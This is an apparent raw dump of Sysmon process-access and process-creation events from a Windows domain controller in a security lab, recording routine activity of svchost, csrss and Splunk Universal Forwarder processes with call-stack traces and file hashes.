15:51:24.987{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002303Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:24.987{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002302Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:24.987{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002301Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:24.987{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002300Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:24.987{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7C7C-5FA1-6C00-000000008801}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002299Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:24.987{D28789B6-7C73-5FA1-3300-000000008801}26763928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7C7C-5FA1-6C00-000000008801}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002298Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:24.806{D28789B6-7C7C-5FA1-6C00-000000008801}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002340Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:26.862{D28789B6-7C7E-5FA1-6E00-000000008801}42884292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002339Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:26.706{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C7E-5FA1-6E00-000000008801}4288C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002338Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:26.706{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002337Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:26.706{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002336Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:26.706{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002335Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:26.706{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002334Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:26.706{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002333Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:26.706{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002332Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:26.706{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002331Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:26.706{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002330Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:26.706{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002329Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:26.706{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7C7E-5FA1-6E00-000000008801}4288C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002328Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:26.706{D28789B6-7C73-5FA1-3300-000000008801}26763928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7C7E-5FA1-6E00-000000008801}4288C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002327Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:26.524{D28789B6-7C7E-5FA1-6E00-000000008801}4288C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002354Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:27.519{D28789B6-7C7F-5FA1-6F00-000000008801}43244328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002353Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:27.378{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C7F-5FA1-6F00-000000008801}4324C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002352Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:27.378{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002351Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:27.378{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002350Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:27.378{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002349Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:27.378{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002348Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 